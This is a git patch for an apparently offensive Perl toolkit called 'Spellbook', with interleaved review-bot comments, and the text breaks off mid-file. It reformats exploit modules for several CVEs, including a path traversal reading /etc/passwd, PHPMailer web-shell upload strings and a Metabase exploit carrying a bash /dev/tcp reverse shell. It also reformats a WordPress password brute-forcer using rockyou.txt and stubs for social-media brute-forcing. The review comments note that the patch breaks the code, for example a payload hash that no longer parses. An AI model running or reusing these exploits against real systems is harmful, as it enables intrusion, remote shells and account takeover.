From: priv <140729444+scriptprivate@users.noreply.github.com> Date: Tue, 12 Nov 2024 10:59:22 -0300 Subject: [PATCH 16/17] address linter warnings (#113) --- lib/Spellbook/Advisory/CVE_2006_3392.pm | 27 +++-- lib/Spellbook/Advisory/CVE_2016_10045.pm | 27 +++-- lib/Spellbook/Advisory/CVE_2017_5487.pm | 25 +++-- lib/Spellbook/Advisory/CVE_2020_9376.pm | 17 +-- lib/Spellbook/Advisory/CVE_2020_9377.pm | 23 ++-- lib/Spellbook/Advisory/CVE_2021_24891.pm | 15 ++- lib/Spellbook/Advisory/CVE_2021_41773.pm | 23 ++-- lib/Spellbook/Advisory/CVE_2023_29489.pm | 21 ++-- lib/Spellbook/Advisory/CVE_2023_38646.pm | 35 +++--- lib/Spellbook/Advisory/CVE_2024_4040.pm | 33 +++--- .../Advisory/Laravel_Ignition_XSS.pm | 19 ++-- lib/Spellbook/Android/APKSign.pm | 19 ++-- lib/Spellbook/Android/Manifest.pm | 28 +++-- lib/Spellbook/Android/Strings.pm | 13 ++- lib/Spellbook/Bruteforce/Facebook.pm | 15 ++- lib/Spellbook/Bruteforce/Instagram.pm | 17 +-- .../Bruteforce/{Linkedin.pm => LinkedIn.pm} | 15 ++- lib/Spellbook/Bruteforce/SMTP.pm | 13 ++- lib/Spellbook/Bruteforce/Twitter.pm | 15 ++- lib/Spellbook/Bruteforce/Wordpress.pm | 21 ++-- lib/Spellbook/Core/Credentials.pm | 21 ++-- lib/Spellbook/Core/Helper.pm | 23 ++-- lib/Spellbook/Core/Module.pm | 27 +++-- lib/Spellbook/Core/Orchestrator.pm | 33 +++--- lib/Spellbook/Exploit/CORS_Misconfig.pm | 19 ++-- lib/Spellbook/Exploit/DataBreach.pm | 17 +-- lib/Spellbook/Exploit/Django_DEBUG.pm | 19 ++-- lib/Spellbook/Exploit/Fullchain_DLINK.pm | 35 +++--- lib/Spellbook/Exploit/HAProxy_Exposed.pm | 17 +-- lib/Spellbook/Exploit/Headers_Misconfig.pm | 17 +-- lib/Spellbook/Exploit/Mixed_Content.pm | 26 +++-- lib/Spellbook/Exploit/None_Attack.pm | 17 +-- lib/Spellbook/Exploit/Pwn_DB.pm | 22 ++-- lib/Spellbook/Exploit/Redis_Unauth.pm | 23 ++-- lib/Spellbook/Exploit/Reflected_XSS.pm | 17 +-- lib/Spellbook/Exploit/S3_Bucket_Takeover.pm | 17 +-- lib/Spellbook/Exploit/Shellshock.pm | 17 +-- lib/Spellbook/Exploit/Subdomain_Takeover.pm | 104 +++++++++--------- 
lib/Spellbook/Exploit/Swagger_XSS.pm | 98 ++++++++--------- lib/Spellbook/Exploit/Upload_Via_PUT.pm | 15 ++- lib/Spellbook/Helper/CDN_Checker.pm | 74 ++++++------- lib/Spellbook/Helper/Exifs_Write.pm | 15 ++- lib/Spellbook/Helper/Generate_UUID.pm | 19 ++-- lib/Spellbook/Helper/Host_Normalization.pm | 15 ++- lib/Spellbook/Helper/Permutations.pm | 21 ++-- lib/Spellbook/Helper/Read_File.pm | 41 +++---- lib/Spellbook/Helper/Reverse_Shell.pm | 21 ++-- lib/Spellbook/Helper/Scope.pm | 29 ++--- lib/Spellbook/Helper/Uniq.pm | 13 ++- lib/Spellbook/Parser/Nmap.pm | 23 ++-- lib/Spellbook/Parser/Nozaki.pm | 13 ++- lib/Spellbook/Parser/S3_Bucket.pm | 21 ++-- lib/Spellbook/Parser/Sitemap.pm | 17 +-- lib/Spellbook/Platform/HackerOne.pm | 19 ++-- lib/Spellbook/Platform/Intigriti.pm | 11 +- lib/Spellbook/Recon/DNS_Bruteforce.pm | 19 ++-- lib/Spellbook/Recon/Detect_Error.pm | 17 +-- lib/Spellbook/Recon/Dorking.pm | 12 +- lib/Spellbook/Recon/Extract_Links.pm | 23 ++-- lib/Spellbook/Recon/Find_Emails.pm | 15 ++- lib/Spellbook/Recon/Get_IP.pm | 15 ++- lib/Spellbook/Recon/HTTP_Probe.pm | 17 +-- lib/Spellbook/Recon/HaveBeenPwned.pm | 15 ++- lib/Spellbook/Recon/Host_Resolv.pm | 17 +-- lib/Spellbook/Recon/Internal_DNS.pm | 13 ++- lib/Spellbook/Recon/Masscan.pm | 33 +++--- lib/Spellbook/Recon/Nmap_Scanner.pm | 29 ++--- lib/Spellbook/Recon/Query_Shodan.pm | 15 ++- lib/Spellbook/Recon/Shodan_Enumeration.pm | 15 ++- lib/Spellbook/Recon/Subdomain_Enumeration.pm | 17 +-- lib/Spellbook/Recon/Technologies.pm | 15 ++- lib/Spellbook/Recon/WayBackUrls.pm | 19 ++-- spellbook.pl | 4 +- 73 files changed, 942 insertions(+), 725 deletions(-) rename lib/Spellbook/Bruteforce/{Linkedin.pm => LinkedIn.pm} (68%) diff --git a/lib/Spellbook/Advisory/CVE_2006_3392.pm b/lib/Spellbook/Advisory/CVE_2006_3392.pm index 211e06a..90f5e12 100644 --- a/lib/Spellbook/Advisory/CVE_2006_3392.pm +++ b/lib/Spellbook/Advisory/CVE_2006_3392.pm 
@@ -2,7 +2,7 @@ package Spellbook::Advisory::CVE_2006_3392 { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $file); @@ -15,24 +15,27 @@ package Spellbook::Advisory::CVE_2006_3392 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my $temp = "/..%01" x 40; my $request = $userAgent -> get($target . "/unauthenticated/" . $temp . $file); - - return $request -> content(); - } + + return $request -> content(); + } if ($help) { - return " - \rExploit::CVE_2006_3392 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-f, --file Define a file to read\n\n"; + return <<"EOT"; + +Exploit::CVE_2006_3392 +======================= +-h, --help See this menu +-t, --target Define a target +-f, --file Define a file to read + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2016_10045.pm b/lib/Spellbook/Advisory/CVE_2016_10045.pm index 6c7a61f..a53742f 100644 --- a/lib/Spellbook/Advisory/CVE_2016_10045.pm +++ b/lib/Spellbook/Advisory/CVE_2016_10045.pm @@ -7,7 +7,7 @@ package Spellbook::Advisory::CVE_2016_10045 { sub new { my ($self, $parameters) = @_; my ($help, $target, @results); - + my $dir = "/var/www/html/uploads"; my %shell = ( "name" => "spellbook_xpl.php", @@ -21,9 +21,9 @@ package Spellbook::Advisory::CVE_2016_10045 { "S|shell=s" => \$shell{name}, "d|directory=s" => \$dir ); - + if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } 
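Review bot: The scheme check rewritten throughout this commit, `/^http(?:s)?:\/\//x`, is a longer spelling of `m{\Ahttps?://}`: the group around a single character is unnecessary and the `/x` flag does nothing in a pattern with no whitespace. The same block is repeated in every module this patch touches (the CVE_2016_10045 hunk at the end of this line is the next instance), while the diffstat lists `lib/Spellbook/Helper/Host_Normalization.pm`; if that helper does the same job, calling it would replace the copies. In CVE_2006_3392 the help heading still reads `Exploit::CVE_2006_3392` although the package is `Spellbook::Advisory::CVE_2006_3392`.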
@@ -34,10 +34,10 @@ package Spellbook::Advisory::CVE_2016_10045 { $shell{code} = $code -> slurp(); } - + my $CVE_2016_10033 = "\"attacker\\\" -oQ/tmp/ -X$dir/$shell{name} some\"\@email.com"; my $CVE_2016_10045 = "\"attacker\\' -oQ/tmp/ -X$dir/$shell{name} some\"\@email.com"; - + try { my $request = $userAgent -> post($target, [ "action" => "send", @@ -62,13 +62,16 @@ package Spellbook::Advisory::CVE_2016_10045 { } if ($help) { - return " - \rExploit::CVE_2016_10045 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-S, --shell - \r-d, --directory \n\n"; + return<<"EOT"; + +Exploit::CVE_2016_10045 +======================= +-h, --help See this menu +-t, --target Define a target +-S, --shell +-d, --directory \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2017_5487.pm b/lib/Spellbook/Advisory/CVE_2017_5487.pm index c10b3eb..4d2f6f3 100755 --- a/lib/Spellbook/Advisory/CVE_2017_5487.pm +++ b/lib/Spellbook/Advisory/CVE_2017_5487.pm @@ -15,11 +15,11 @@ package Spellbook::Advisory::CVE_2017_5487 { "t|target=s" => \$target ); - if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my $request = $userAgent -> get("$target/wp-json/wp/v2/users"); @@ -29,11 +29,11 @@ package Spellbook::Advisory::CVE_2017_5487 { foreach my $data (@$content) { my $username = $data -> {slug}; - + if ($username) { push @result, $username; } - } + } }; return @result; @@ -42,14 +42,17 @@ package Spellbook::Advisory::CVE_2017_5487 { } if ($help) { - return " - \rExploit::CVE_2017_5487 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::CVE_2017_5487 +======================= +-h, --help See this menu +r-t, --target Define a target\n\n"; + +EOT } - return 0; + return 0; } } 
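Review bot: The help heredoc added in the `@@ -62,13 +62,16 @@` hunk of CVE_2016_10045.pm still carries the tail of the old string literal: the last body line is `-d, --directory \n\n";`, so the returned text now ends with two extra newlines followed by a literal `";`. The same leftover (`\n\n";`, `\n";`, `";` or `\n;`) is present in nearly every other help hunk in this patch; only CVE_2006_3392.pm was converted cleanly. The CVE_2017_5487.pm help also kept a stray `r` from the removed `\r`, in `r-t, --target`, which should read `-t, --target`. End each body on the last option line followed by one blank line and `EOT`, and since nothing in these texts is interpolated, `<<'EOT'` would make that explicit.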
diff --git a/lib/Spellbook/Advisory/CVE_2020_9376.pm b/lib/Spellbook/Advisory/CVE_2020_9376.pm index 2eb317d..a07175f 100644 --- a/lib/Spellbook/Advisory/CVE_2020_9376.pm +++ b/lib/Spellbook/Advisory/CVE_2020_9376.pm @@ -3,7 +3,7 @@ package Spellbook::Advisory::CVE_2020_9376 { use warnings; use Mojo::DOM; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @results); @@ -15,7 +15,7 @@ package Spellbook::Advisory::CVE_2020_9376 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } @@ -38,11 +38,14 @@ package Spellbook::Advisory::CVE_2020_9376 { } if ($help) { - return " - \rAdvisory::CVE_2020_9376 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target to exploit\n\n"; + return<<"EOT"; + +Advisory::CVE_2020_9376 +======================= +-h, --help See this menu +-t, --target Define a target to exploit\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2020_9377.pm b/lib/Spellbook/Advisory/CVE_2020_9377.pm index 5cac0b5..d5349b8 100644 --- a/lib/Spellbook/Advisory/CVE_2020_9377.pm +++ b/lib/Spellbook/Advisory/CVE_2020_9377.pm @@ -2,7 +2,7 @@ package Spellbook::Advisory::CVE_2020_9377 { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $cookie, $command, @results); @@ -16,13 +16,13 @@ package Spellbook::Advisory::CVE_2020_9377 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); my $payload = "cmd=$command"; - + my $headers = HTTP::Headers -> new ( "Content-Type" => "application/x-www-form-urlencoded", "Cookie" => "uid=$cookie" 
@@ -39,13 +39,16 @@ package Spellbook::Advisory::CVE_2020_9377 { } if ($help) { - return " - \rAdvisory::CVE_2020_9377 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-c, --cookie Define a session cookie - \r-p, --payload Set the command to run on the target\n\n"; + return<<"EOT"; + +Advisory::CVE_2020_9377 +======================= +-h, --help See this menu +-t, --target Define a target +-c, --cookie Define a session cookie +-p, --payload Set the command to run on the target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2021_24891.pm b/lib/Spellbook/Advisory/CVE_2021_24891.pm index ee0d49f..f3197ea 100644 --- a/lib/Spellbook/Advisory/CVE_2021_24891.pm +++ b/lib/Spellbook/Advisory/CVE_2021_24891.pm @@ -14,7 +14,7 @@ package Spellbook::Advisory::CVE_2021_24891 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -44,11 +44,14 @@ package Spellbook::Advisory::CVE_2021_24891 { } if ($help) { - return " - \rAdvisory::CVE_2021_24891 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Advisory::CVE_2021_24891 +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2021_41773.pm b/lib/Spellbook/Advisory/CVE_2021_41773.pm index 3bbae0d..1fe890a 100644 --- a/lib/Spellbook/Advisory/CVE_2021_41773.pm +++ b/lib/Spellbook/Advisory/CVE_2021_41773.pm @@ -16,10 +16,10 @@ package Spellbook::Advisory::CVE_2021_41773 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + if (!$file) { $file = "/etc/passwd"; } my $payload = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/"; 
@@ -34,7 +34,7 @@ package Spellbook::Advisory::CVE_2021_41773 { my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> get( - "https://" . $target . $payload, + "https://" . $target . $payload, Content => $command || " " ); @@ -44,13 +44,16 @@ package Spellbook::Advisory::CVE_2021_41773 { } if ($help) { - return " - \rExploit::CVE_2021_41773 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-f, --file Define a file to read - \r-c, --command Arbitrary code execution\n\n"; + return<<"EOT"; + +Exploit::CVE_2021_41773 +======================= +-h, --help See this menu +-t, --target Define a target +-f, --file Define a file to read +-c, --command Arbitrary code execution\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2023_29489.pm b/lib/Spellbook/Advisory/CVE_2023_29489.pm index 8f69a94..59e4b58 100644 --- a/lib/Spellbook/Advisory/CVE_2023_29489.pm +++ b/lib/Spellbook/Advisory/CVE_2023_29489.pm @@ -13,11 +13,11 @@ package Spellbook::Advisory::CVE_2023_29489 { "t|target=s" => \$target ); - if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my @payloads = ( @@ -39,14 +39,17 @@ package Spellbook::Advisory::CVE_2023_29489 { } if ($help) { - return " - \rExploit::CVE_2023_29489 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::CVE_2023_29489 +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } - return 0; + return 0; } } diff --git a/lib/Spellbook/Advisory/CVE_2023_38646.pm b/lib/Spellbook/Advisory/CVE_2023_38646.pm index 2660ce3..966b399 100644 --- a/lib/Spellbook/Advisory/CVE_2023_38646.pm +++ b/lib/Spellbook/Advisory/CVE_2023_38646.pm 
@@ -23,23 +23,23 @@ package Spellbook::Advisory::CVE_2023_38646 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); - my $request = $userAgent -> get("$target/api/session/properties"); + my $initial_request = $userAgent -> get("$target/api/session/properties"); - if ($request -> code() == 200) { + if ($initial_request -> code() == 200) { try { - my $content = decode_json($request -> content); + my $content = decode_json($initial_request -> content); my $token = $content -> {"setup-token"}; if ($token) { my $headers = HTTP::Headers -> new ("Content-Type" => "application/json"); my $reverse = encode_base64("bash -i >& /dev/tcp/$remote/$port 0>&1", ""); - my $payload = qq({ + my $payload = { "token": "$token", "details": { "is_on_demand": false, @@ -57,10 +57,12 @@ package Spellbook::Advisory::CVE_2023_38646 { "name": "an-sec-research-team", "engine": "h2" } - }); + }; - my $request = HTTP::Request -> new("POST", "$target/api/setup/validate", $headers, $payload); - my $response = $userAgent -> request($request); + my $json_payload = encode_json($payload); + + my $exploit_request = HTTP::Request -> new("POST", "$target/api/setup/validate", $headers, $payload); + my $response = $userAgent -> request($exploit_request); if ($response -> code() == 400) { push @result, "\n[+] $target exploited\n"; 
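Review bot: `$payload` in CVE_2023_38646.pm is now opened with a bare `{`, but its body still uses JSON-style `"key": value` pairs and the bareword `false`, which is not a Perl hash constructor, so this file should no longer parse and loading the module will fail. The second hunk adds `my $json_payload = encode_json($payload);` and never uses it; `HTTP::Request -> new(...)` is still given `$payload`. Either keep the body as one string, as in the `qq(...)` form this commit removes, or write a real hash reference with `=>` and pass `$json_payload` as the request content. The middle of the structure lies between the two hunks and is not visible here.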
@@ -73,13 +75,16 @@ package Spellbook::Advisory::CVE_2023_38646 { } if ($help) { - return " - \rExploit::CVE_2023_38646 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-r, --remote Set the address to receive the reverse shell - \r-p, --port Set the port of reverse shell\n\n"; + return<<"EOT"; + +Exploit::CVE_2023_38646 +======================= +-h, --help See this menu +-t, --target Define a target +-r, --remote Set the address to receive the reverse shell +-p, --port Set the port of reverse shell\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2024_4040.pm b/lib/Spellbook/Advisory/CVE_2024_4040.pm index 336f0e4..c162fe7 100644 --- a/lib/Spellbook/Advisory/CVE_2024_4040.pm +++ b/lib/Spellbook/Advisory/CVE_2024_4040.pm @@ -17,18 +17,18 @@ package Spellbook::Advisory::CVE_2024_4040 { "payload=s" => \$payload, "help" => \$help ); - + if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $endpoint = "$target/WebInterface/"; my $userAgent = Spellbook::Core::UserAgent -> new(); my $cookie_jar = HTTP::Cookies -> new(); - + $userAgent -> cookie_jar($cookie_jar); - + my $response = $userAgent -> post($endpoint); $cookie_jar -> extract_cookies($response); @@ -36,12 +36,12 @@ package Spellbook::Advisory::CVE_2024_4040 { my $cookies = $response -> header("Set-Cookie"); - if ($cookies =~ /currentAuth=([^;]+)/x) { - $response = $userAgent -> post($endpoint, - Content_Type => "application/x-www-form-urlencoded", + if ($cookies =~ /currentAuth=([^;]+)/x) { + $response = $userAgent -> post($endpoint, + Content_Type => "application/x-www-form-urlencoded", Content => "command=exists&paths=$payload&c2f=$1" ); - + push @result, $response -> decoded_content(); } 
@@ -49,12 +49,15 @@ package Spellbook::Advisory::CVE_2024_4040 { } if ($help) { - return " - \rAdvisory::CVE_2024_4040 - \r======================================== - \r-h, --help See this menu - \r-u, --target Define the targeted CrushFTP server URL - \r-p, --payload Set the payload to run on the target\n\n"; + return<<"EOT"; + +Advisory::CVE_2024_4040 +======================================== +-h, --help See this menu +-u, --target Define the targeted CrushFTP server URL +-p, --payload Set the payload to run on the target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm b/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm index 489c545..5d29c85 100644 --- a/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm +++ b/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm @@ -15,10 +15,10 @@ package Spellbook::Advisory::Laravel_Ignition_XSS { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my @uuid = Spellbook::Helper::Generate_UUID -> new(["--version" => 4, "--repeat" => 1]); my $payload = "$target/_ignition/scripts/--%3E%3Csvg%20onload=alert%28$uuid[0]%29%3E"; my $userAgent = Spellbook::Core::UserAgent -> new(); @@ -31,16 +31,19 @@ package Spellbook::Advisory::Laravel_Ignition_XSS { ) { push @results, $target; } - + return @results; } if ($help) { - return " - \rAdvisory::CVE_ - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Advisory::CVE_ +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Android/APKSign.pm b/lib/Spellbook/Android/APKSign.pm index 58745de..7250745 100755 --- a/lib/Spellbook/Android/APKSign.pm +++ b/lib/Spellbook/Android/APKSign.pm 
@@ -21,15 +21,18 @@ package Spellbook::Android::APKSign { } if ($help) { - return " - \rAndroid::APKSign - \r================ - \r-h, --help See this menu - \r-a, --apk Pass the APK file - \r-n, --name Set de package name - \r-p, --password Define a password\n"; + return<<"EOT"; + +Android::APKSign +================ +-h, --help See this menu +-a, --apk Pass the APK file +-n, --name Set de package name +-p, --password Define a password\n"; + +EOT } - + return 0; } } diff --git a/lib/Spellbook/Android/Manifest.pm b/lib/Spellbook/Android/Manifest.pm index 065953f..57fc37f 100755 --- a/lib/Spellbook/Android/Manifest.pm +++ b/lib/Spellbook/Android/Manifest.pm @@ -27,21 +27,27 @@ package Spellbook::Android::Manifest { # Exported Android Components # Access to protected intents via exported Activities # Access to sensitive data via exported Activity - - return " - \r[ - ] -> Package name: $package - \r[ - ] -> Debug: $debug - \r[ - ] -> Backup: $backup\n\n"; + + return join("\n", + "[ - ] -> Package name: $package", + "[ - ] -> Debug: $debug", + "[ - ] -> Backup: $backup", + "", + "" + ); } if ($help) { - return " - \rAndroid::Manifest - \r============== - \r-h, --help See this menu - \r-f, --file Pass the AndroidManifest.xml file\n\n"; + return<<"EOT"; + +Android::Manifest +============== +-h, --help See this menu +-f, --file Pass the AndroidManifest.xml file\n\n"; + +EOT } - + return 0; } } diff --git a/lib/Spellbook/Android/Strings.pm b/lib/Spellbook/Android/Strings.pm index 3bb0b51..79cf20d 100755 --- a/lib/Spellbook/Android/Strings.pm +++ b/lib/Spellbook/Android/Strings.pm @@ -12,17 +12,20 @@ package Spellbook::Android::Strings { # resources.arsc/strings.xml # res/xml/file_paths.xml - + # if (Dumper($data) =~ m/:\/\//) { # return "true"; # } } if ($help) { - return " - \rAndroid:: - \r================ - \r-h, --help See this menu\n"; + return<<"EOT"; + +Android:: +================ +-h, --help See this menu\n"; + +EOT } return 0; 
diff --git a/lib/Spellbook/Bruteforce/Facebook.pm b/lib/Spellbook/Bruteforce/Facebook.pm index 7f291ef..004034b 100644 --- a/lib/Spellbook/Bruteforce/Facebook.pm +++ b/lib/Spellbook/Bruteforce/Facebook.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::Facebook { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -18,11 +18,14 @@ package Spellbook::Bruteforce::Facebook { } if ($help) { - return " - \rBruteforce::Facebook - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Bruteforce::Facebook +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } } } diff --git a/lib/Spellbook/Bruteforce/Instagram.pm b/lib/Spellbook/Bruteforce/Instagram.pm index d1d5022..7f99fe3 100644 --- a/lib/Spellbook/Bruteforce/Instagram.pm +++ b/lib/Spellbook/Bruteforce/Instagram.pm @@ -18,15 +18,18 @@ package Spellbook::Bruteforce::Instagram { if ($username) { my $useragent = LWP::UserAgent -> new(); - } + } if ($help) { - return " - \rExploit::Brute_Force_Instagram - \r======================= - \r-h, --help See this menu - \r-u, --username Define a username - \r-f, --file Define a file to read\n\n"; + return<<"EOT"; + +Exploit::Brute_Force_Instagram +======================= +-h, --help See this menu +-u, --username Define a username +-f, --file Define a file to read\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Bruteforce/Linkedin.pm b/lib/Spellbook/Bruteforce/LinkedIn.pm similarity index 68% rename from lib/Spellbook/Bruteforce/Linkedin.pm rename to lib/Spellbook/Bruteforce/LinkedIn.pm index d59352d..8b6a8e7 100644 --- a/lib/Spellbook/Bruteforce/Linkedin.pm +++ b/lib/Spellbook/Bruteforce/LinkedIn.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::LinkedIn { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); 
@@ -18,11 +18,14 @@ package Spellbook::Bruteforce::LinkedIn { } if ($help) { - return " - \rBruteforce::LinkedIn - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Bruteforce::LinkedIn +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } } } diff --git a/lib/Spellbook/Bruteforce/SMTP.pm b/lib/Spellbook/Bruteforce/SMTP.pm index 727b096..d976736 100644 --- a/lib/Spellbook/Bruteforce/SMTP.pm +++ b/lib/Spellbook/Bruteforce/SMTP.pm @@ -18,11 +18,14 @@ package Spellbook::Bruteforce::SMTP { } if ($help) { - return " - \rBruteforce::SMTP - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Bruteforce::SMTP +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } } } diff --git a/lib/Spellbook/Bruteforce/Twitter.pm b/lib/Spellbook/Bruteforce/Twitter.pm index d094ea4..cd1b3ed 100644 --- a/lib/Spellbook/Bruteforce/Twitter.pm +++ b/lib/Spellbook/Bruteforce/Twitter.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::Twitter { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -18,11 +18,14 @@ package Spellbook::Bruteforce::Twitter { } if ($help) { - return " - \rBruteforce::Twitter - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Bruteforce::Twitter +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } } } diff --git a/lib/Spellbook/Bruteforce/Wordpress.pm b/lib/Spellbook/Bruteforce/Wordpress.pm index b204b07..f19689e 100644 --- a/lib/Spellbook/Bruteforce/Wordpress.pm +++ b/lib/Spellbook/Bruteforce/Wordpress.pm @@ -3,6 +3,7 @@ package Spellbook::Bruteforce::Wordpress { use warnings; use LWP::UserAgent; use HTTP::Request::Common; + use Carp qw(croak); # THIS IS A DRAFT MODULE 
@@ -18,28 +19,32 @@ package Spellbook::Bruteforce::Wordpress { ); if ($target) { - open(my $wordlist, "<", "./files/rockyou.txt"); + open(my $wordlist, "<", "./files/rockyou.txt") + or croak "Could not open wordlist file: $!"; + my @passwords = <$wordlist>; + close($wordlist) or croak "Could not close wordlist file: $!"; - while (<$wordlist>) { - chomp ($_); + chomp(@passwords); + foreach my $password (@passwords) { my $useragent = LWP::UserAgent->new; my $response = $useragent -> request(POST $target, [ log => $username, - pwd => $_, + pwd => $password, ]); if ($response -> is_success) { - print "Successfully logged in with password: $_ \n"; + print "Successfully logged in with password: $password \n"; + last; } } - - close($wordlist); } if ($help) { - return ""; + return<<"EOT"; + +EOT } return 0; diff --git a/lib/Spellbook/Core/Credentials.pm b/lib/Spellbook/Core/Credentials.pm index f12d6e8..309d19f 100644 --- a/lib/Spellbook/Core/Credentials.pm +++ b/lib/Spellbook/Core/Credentials.pm @@ -15,14 +15,14 @@ package Spellbook::Core::Credentials { "p|platform=s" => \$platform, "v|value=s" => \$value, ); - + if ($platform) { my $credentials = Mojo::File -> new(".config/credentials.json"); my $data = $credentials -> slurp(); my $content = decode_json($data); - if ($value) { + if ($value) { $content -> {$platform} = $value; $credentials -> spurt(encode_json($content)); } @@ -31,14 +31,17 @@ package Spellbook::Core::Credentials { } if ($help) { - return " - \rCore::Credentials - \r============== - \r-h, --help See this menu - \r-p, --platform Read some credentials filtering by platform - \r-v, --value Define a value of a platform\n\n"; + return<<"EOT"; + +Core::Credentials +============== +-h, --help See this menu +-p, --platform Read some credentials filtering by platform +-v, --value Define a value of a platform\n\n"; + +EOT } - + return 0; } } diff --git a/lib/Spellbook/Core/Helper.pm b/lib/Spellbook/Core/Helper.pm index f50f568..e77fe88 100644 
--- a/lib/Spellbook/Core/Helper.pm +++ b/lib/Spellbook/Core/Helper.pm @@ -3,17 +3,18 @@ package Spellbook::Core::Helper { use warnings; sub new { - print " - \rSpellbook v0.3.6 - \rCore Commands - \r============== - \r\tCommand Description - \r\t------- ----------- - \r\t-s, --search List modules, you can filter by category - \r\t-m, --module Define a module to use - \r\t-h, --help To see help menu of a module\n\n"; - - return 1; + return<<"EOT"; + +Spellbook v0.3.6 +Core Commands +============== +Command Description +------- ----------- +-s, --search List modules, you can filter by category +-m, --module Define a module to use +-h, --help To see help menu of a module\n\n"; + +EOT } } diff --git a/lib/Spellbook/Core/Module.pm b/lib/Spellbook/Core/Module.pm index cb54b7e..82b3a7f 100644 --- a/lib/Spellbook/Core/Module.pm +++ b/lib/Spellbook/Core/Module.pm @@ -2,20 +2,31 @@ package Spellbook::Core::Module { use strict; use warnings; use Spellbook::Core::Resources; + use Carp qw(croak); sub new { my ($self, $module, @parameters) = @_; - my $resources = Spellbook::Core::Resources -> new(); + my $resources = Spellbook::Core::Resources->new(); - foreach my $package (@{$resources -> {modules}}) { - my $category = ucfirst $package -> {category}; - my $name = $category . "::" . $package -> {module}; + foreach my $package (@{$resources->{modules}}) { + my $category = ucfirst $package->{category}; + my $name = $category . "::" . $package->{module}; - if ($name eq $module) { - require "Spellbook/" . $category . "/" . $package -> {module} . ".pm"; + if ($name eq $module) { + my $module_path = "Spellbook::" . $category . "::" . $package->{module}; - my @run = "Spellbook::$name" -> new(@parameters); + my $success = eval { + require Module::Load; + Module::Load::load($module_path); + 1; + }; + + if (!$success || $@) { + croak "Failed to load module 